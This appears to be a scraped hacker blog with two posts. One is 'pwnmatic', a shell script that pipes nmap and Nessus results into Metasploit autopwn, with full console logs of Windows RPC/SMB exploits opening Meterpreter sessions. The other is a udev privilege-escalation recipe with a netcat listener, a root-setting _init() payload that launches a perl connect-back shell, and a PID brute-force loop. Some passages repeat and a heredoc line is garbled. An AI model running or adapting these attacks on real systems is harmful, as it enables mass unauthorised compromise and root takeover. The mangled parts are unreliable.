[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.224.131[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.224.131[135] ...
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.224.131[\lsarpc]...
[*] Handler binding to LHOST 0.0.0.0
[*] Sending exploit ...
[*] Started reverse handler
msf >
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.224.131[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] The DCERPC service did not reply to our request
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.224.131[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.224.131[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] The DCERPC service did not reply to our request
[*] Meterpreter session 1 opened (192.168.224.129:34295 -> 192.168.224.131:1034)
[*] Meterpreter session 2 opened (192.168.224.129:23499 -> 192.168.224.131:1035)
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.224.129:34295 -> 192.168.224.131:1034
2 Meterpreter 192.168.224.129:23499 -> 192.168.224.131:1035
msf >
Just run it, go for a coffee and come back to get your r00t on :)
##
# Autopwn pwnmatic
##
#!/bin/sh
NESSUS=~/pentest/scanners/nessus/bin/ #nessus binary
MSF=~/pentest/exploiting/metasploit #msf console location
LOG=~/audits/scans/nessus/$2.nbe #report location
HOSTS=./nessus_hosts.txt
AUTOPWN=./autopwn
echo "Starting scan..."
nmap -v -n -sP $1 |grep Host | grep up | awk '{print $2}' > $HOSTS
echo "Scan finished, starting nessus..."
$NESSUS/nessus localhost 1337 user p4ssw0rd $HOSTS $LOG
echo "Nessus finished, converting log..."
$NESSUS/nessus -i $LOG -o $LOG.txt
$NESSUS/nessus -i $LOG -o $LOG.nessus
mv $HOSTS ~/audits/scans/nmap/$2-nmap_auto.txt
echo "Do you want to import into metasploit autopwn? (y/n)"
read DOU
if [ $DOU == "y" ] ; then
cat > $AUTOPWN << _EOF
db_create $2.db
db_import_nessus_nbe $LOG
db_autopwn -x -r -e
_EOF
echo "please wait..."
$MSF/msfconsole -r $AUTOPWN
else
echo "Listing any fulnerabilities then..."
A=`egrep "Security hole found" $LOG.txt | sort -u`
if [ $A -eq "" ] ; then
echo " --> None found :("
else
echo $A
fi
echo "Finished."
fi
##
# End
###
user@debauch:~/scripts$ ./pwnmatic.sh 192.168.224.0/24 test-run
Starting scan...
Scan finished, starting nessus...
Nessus finished, converting log...
Do you want to import into metasploit autopwn? (y/n)
y
please wait...
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ msf v3.3-dev
+ -- --=[ 379 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 158 aux
resource> db_create testing.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: testing.db
resource> db_import_nessus_nbe /home/user/audits/scans/nessus/testing.nbe
resource> db_autopwn -x -r -e
[*] (1/4): Launching exploit/windows/smb/ms04_011_lsass against 192.168.224.131:445...
[*] (2/4): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.224.131:135...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] (4/4): Launching exploit/windows/smb/ms06_040_netapi against 192.168.224.131:445...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.224.131[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.224.131[135] ...
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.224.131[\lsarpc]...
[*] Handler binding to LHOST 0.0.0.0
[*] Sending exploit ...
[*] Started reverse handler
msf >
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.224.131[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] The DCERPC service did not reply to our request
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.224.131[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.224.131[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] The DCERPC service did not reply to our request
[*] Meterpreter session 1 opened (192.168.224.129:34295 -> 192.168.224.131:1034)
[*] Meterpreter session 2 opened (192.168.224.129:23499 -> 192.168.224.131:1035)
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.224.129:34295 -> 192.168.224.131:1034
2 Meterpreter 192.168.224.129:23499 -> 192.168.224.131:1035
msf >
Labels: Security
UDEV Exploit
I noticed that a lot of times during a test, the UDEV exploit doesn't always work or you can't find the process ID due to restrictions on the user account.
For a 99.9% chance of success on all OS, I find the following works best:
Set up a listener on the local box:
screen
nc -l -p 1234 -v
ctrl + A + D
Change program.c to this:
NUM=10
while [ $NUM -lt 4000 ] ; do
/tmp/udev $NUM&
((NUM = NUM +1))
done
For a 99.9% chance of success on all OS, I find the following works best:
Set up a listener on the local box:
screen
nc -l -p 1234 -v
ctrl + A + D
Change program.c to this:
cat > program.c <<>Works a treat. And if you can't get the PID, this simple little script will solve the problem 100% of the time
...SNIP...
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/usr/bin/perl","perl","/tmp/connectback.pl","localhost","1234",NULL);
}
NUM=10
while [ $NUM -lt 4000 ] ; do
/tmp/udev $NUM&
((NUM = NUM +1))
done
Labels: Security
Layout design by Pannasmontata and me :)